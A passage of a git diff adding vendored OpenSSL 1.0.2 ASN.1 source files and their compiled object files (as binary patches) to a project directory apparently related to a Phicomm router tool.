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
Ll$oV}t?mB<cV2k!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_nx509.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_nx509.c
new file mode 100644
index 0000000..5aa0ed5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_nx509.c
@@ -0,0 +1,72 @@
+/* x_nx509.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+
+/* Old netscape certificate wrapper format */
+
+ASN1_SEQUENCE(NETSCAPE_X509) = {
+        ASN1_SIMPLE(NETSCAPE_X509, header, ASN1_OCTET_STRING),
+        ASN1_OPT(NETSCAPE_X509, cert, X509)
+} ASN1_SEQUENCE_END(NETSCAPE_X509)
+
+IMPLEMENT_ASN1_FUNCTIONS(NETSCAPE_X509)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_nx509.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_nx509.o
new file mode 100644
index 0000000000000000000000000000000000000000..dcac7037978dbf006fa00deeff3cbcd3def3b565
GIT binary patch
literal 3064
zcmbuB%}*0i5WuGt1r_BZenpJglOItwZG|9yrBDl)kV0rlYSb*Htbo!M+iff!l*EH4
z6Hg|_ix=bn;EAg@{{q8NkH(uZ!I|Be-N)N)Omvdnnfbk$d9!cdzV>-`X0js|1Cbcq
zguoLD(CP~8v}>ke0Q%u)@0nlIuMQLWPB+g#rujECf5i85*+M=uK9{wMBZ)CswM)x(
z9m;myp$HV|rO$Kydxvj%hCZ$h|J9XwB(PfyT~B2)SB>)vOU<g&G{(%!W@0Eg+H~FI
zvsA)N3}5iDm)MDldfSKBRBi#V?`>jnyhx6E3Sv*^A=c`P4fb?(zs6=L=QNMWvyo0j
zuv-zVs4;d!ik`a@e(Z(@5XAk}-#Z%jyVp5ASy<xk(?{|BA$SN$41(34QzGIDS1@)%
zSz(DoPZ%PJgS%ftV{tebVg`}{WgX;Qq>%SR(Ek<A%%GMSMy|TkhOZ!}`jR7hvrYU<
zjyF(~Nc>yHb_e+O5jE9MurKkS&=;GBT=lsPzt)CB%c{2U(>2Sm=To*C_G8O&U^%sB
z?HSO*)*P^=W@abGXRO)D$$Yk86~-rKvKEZzb4hE>u`3pqfVI@JRwfw7F|BCTexl@)
zx2FZ`LEW~MfWV#26tIJQVg7b*3Ma>BmSd03n<IGr-u2`J+9WzZ=iv|^ZNp`U$~htR
z<=ZDdfS2$~T!%QF9m20G{J6s99n*Ind{x0YLY&Sfk&|o)r)MTH+`D%k%d-<oE1c@M
zCqL?Gg-cCB26I|Bx<rQA5H5X79pMJY-P7U|?1S0ZtT?45)K1;gt76sd^^)n>EeFiy
zl2Zb6snGzlUL%LXlV%cK3UUcrIB2fd%BA%%2eVwORO~7itJWOb#KV24;grgc*k7qO
z&5e3(1AodkIon>vomZ;Z((3<c1C!|;1t*YKE$t}~&8{0OHt9jUXb+|FQpMoSu+6X+
zHO(V?N8aUG=JGqn;jkr!rm2Q1w2!Igzvd?~muk{EtjZQUr&Nfx%r832OrQTf=gE1_
zE*N64PNR-mza3sb*^jh-^p5oPyN`@|(dXYmMl$Cq|8Dq}XB1II&ELlxVv*x%ewtgK
z{~<D(U;0GTl>{%)MFFfC`|H?1E=&!*8wDd`Um&BimA-3L7CGNgA==Wv;CE<HsGh&Y
z`KuDhTF-xjJZk+mBG!-oEl9rX|ERfXs&71hksIqn7L|Vhx&H1cKTS=ceD#!n=d!-v
Rk5*Lv7w-RqAL$u-{vQdi2_XOg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pkey.c
new file mode 100644
index 0000000..2da23e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pkey.c
@@ -0,0 +1,153 @@
+/* crypto/asn1/x_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/asn1_mac.h>
+#include <openssl/x509.h>
+
+/* need to implement */
+int i2d_X509_PKEY(X509_PKEY *a, unsigned char **pp)
+{
+    return (0);
+}
+
+X509_PKEY *d2i_X509_PKEY(X509_PKEY **a, const unsigned char **pp, long length)
+{
+    int i;
+    M_ASN1_D2I_vars(a, X509_PKEY *, X509_PKEY_new);
+
+    M_ASN1_D2I_Init();
+    M_ASN1_D2I_start_sequence();
+    M_ASN1_D2I_get_x(X509_ALGOR, ret->enc_algor, d2i_X509_ALGOR);
+    M_ASN1_D2I_get_x(ASN1_OCTET_STRING, ret->enc_pkey, d2i_ASN1_OCTET_STRING);
+
+    ret->cipher.cipher =
+        EVP_get_cipherbyname(OBJ_nid2ln
+                             (OBJ_obj2nid(ret->enc_algor->algorithm)));
+    if (ret->cipher.cipher == NULL) {
+        c.error = ASN1_R_UNSUPPORTED_CIPHER;
+        c.line = __LINE__;
+        goto err;
+    }
+    if (ret->enc_algor->parameter->type == V_ASN1_OCTET_STRING) {
+        i = ret->enc_algor->parameter->value.octet_string->length;
+        if (i > EVP_MAX_IV_LENGTH) {
+            c.error = ASN1_R_IV_TOO_LARGE;
+            c.line = __LINE__;
+            goto err;
+        }
+        memcpy(ret->cipher.iv,
+               ret->enc_algor->parameter->value.octet_string->data, i);
+    } else
+        memset(ret->cipher.iv, 0, EVP_MAX_IV_LENGTH);
+    M_ASN1_D2I_Finish(a, X509_PKEY_free, ASN1_F_D2I_X509_PKEY);
+}
+
+X509_PKEY *X509_PKEY_new(void)
+{
+    X509_PKEY *ret = NULL;
+    ASN1_CTX c;
+
+    M_ASN1_New_Malloc(ret, X509_PKEY);
+    ret->version = 0;
+    M_ASN1_New(ret->enc_algor, X509_ALGOR_new);
+    M_ASN1_New(ret->enc_pkey, M_ASN1_OCTET_STRING_new);
+    ret->dec_pkey = NULL;
+    ret->key_length = 0;
+    ret->key_data = NULL;
+    ret->key_free = 0;
+    ret->cipher.cipher = NULL;
+    memset(ret->cipher.iv, 0, EVP_MAX_IV_LENGTH);
+    ret->references = 1;
+    return (ret);
+    M_ASN1_New_Error(ASN1_F_X509_PKEY_NEW);
+}
+
+void X509_PKEY_free(X509_PKEY *x)
+{
+    int i;
+
+    if (x == NULL)
+        return;
+
+    i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_X509_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("X509_PKEY", x);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "X509_PKEY_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (x->enc_algor != NULL)
+        X509_ALGOR_free(x->enc_algor);
+    if (x->enc_pkey != NULL)
+        M_ASN1_OCTET_STRING_free(x->enc_pkey);
+    if (x->dec_pkey != NULL)
+        EVP_PKEY_free(x->dec_pkey);
+    if ((x->key_data != NULL) && (x->key_free))
+        OPENSSL_free(x->key_data);
+    OPENSSL_free(x);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..5281fac9675c4e9eafe4a690078fc518c8f9e8fb
GIT binary patch
literal 4080
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
K)m+k^-Tq%mBf@t8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pubkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pubkey.c
new file mode 100644
index 0000000..4b68201
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pubkey.c
@@ -0,0 +1,371 @@
+/* crypto/asn1/x_pubkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include "asn1_locl.h"
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+/* Minor tweak to operation: free up EVP_PKEY */
+static int pubkey_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                     void *exarg)
+{
+    if (operation == ASN1_OP_FREE_POST) {
+        X509_PUBKEY *pubkey = (X509_PUBKEY *)*pval;
+        EVP_PKEY_free(pubkey->pkey);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(X509_PUBKEY, pubkey_cb) = {
+        ASN1_SIMPLE(X509_PUBKEY, algor, X509_ALGOR),
+        ASN1_SIMPLE(X509_PUBKEY, public_key, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END_cb(X509_PUBKEY, X509_PUBKEY)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_PUBKEY)
+
+int X509_PUBKEY_set(X509_PUBKEY **x, EVP_PKEY *pkey)
+{
+    X509_PUBKEY *pk = NULL;
+
+    if (x == NULL)
+        return (0);
+
+    if ((pk = X509_PUBKEY_new()) == NULL)
+        goto error;
+
+    if (pkey->ameth) {
+        if (pkey->ameth->pub_encode) {
+            if (!pkey->ameth->pub_encode(pk, pkey)) {
+                X509err(X509_F_X509_PUBKEY_SET,
+                        X509_R_PUBLIC_KEY_ENCODE_ERROR);
+                goto error;
+            }
+        } else {
+            X509err(X509_F_X509_PUBKEY_SET, X509_R_METHOD_NOT_SUPPORTED);
+            goto error;
+        }
+    } else {
+        X509err(X509_F_X509_PUBKEY_SET, X509_R_UNSUPPORTED_ALGORITHM);
+        goto error;
+    }
+
+    if (*x != NULL)
+        X509_PUBKEY_free(*x);
+
+    *x = pk;
+
+    return 1;
+ error:
+    if (pk != NULL)
+        X509_PUBKEY_free(pk);
+    return 0;
+}
+
+EVP_PKEY *X509_PUBKEY_get(X509_PUBKEY *key)
+{
+    EVP_PKEY *ret = NULL;
+
+    if (key == NULL)
+        goto error;
+
+    if (key->pkey != NULL) {
+        CRYPTO_add(&key->pkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+        return key->pkey;
+    }
+
+    if (key->public_key == NULL)
+        goto error;
+
+    if ((ret = EVP_PKEY_new()) == NULL) {
+        X509err(X509_F_X509_PUBKEY_GET, ERR_R_MALLOC_FAILURE);
+        goto error;
+    }
+
+    if (!EVP_PKEY_set_type(ret, OBJ_obj2nid(key->algor->algorithm))) {
+        X509err(X509_F_X509_PUBKEY_GET, X509_R_UNSUPPORTED_ALGORITHM);
+        goto error;
+    }
+
+    if (ret->ameth->pub_decode) {
+        if (!ret->ameth->pub_decode(ret, key)) {
+            X509err(X509_F_X509_PUBKEY_GET, X509_R_PUBLIC_KEY_DECODE_ERROR);
+            goto error;
+        }
+    } else {
+        X509err(X509_F_X509_PUBKEY_GET, X509_R_METHOD_NOT_SUPPORTED);
+        goto error;
+    }
+
+    /* Check to see if another thread set key->pkey first */
+    CRYPTO_w_lock(CRYPTO_LOCK_EVP_PKEY);
+    if (key->pkey) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_EVP_PKEY);
+        EVP_PKEY_free(ret);
+        ret = key->pkey;
+    } else {
+        key->pkey = ret;
+        CRYPTO_w_unlock(CRYPTO_LOCK_EVP_PKEY);
+    }
+    CRYPTO_add(&ret->references, 1, CRYPTO_LOCK_EVP_PKEY);
+
+    return ret;
+
+ error:
+    if (ret != NULL)
+        EVP_PKEY_free(ret);
+    return (NULL);
+}
+
+/*
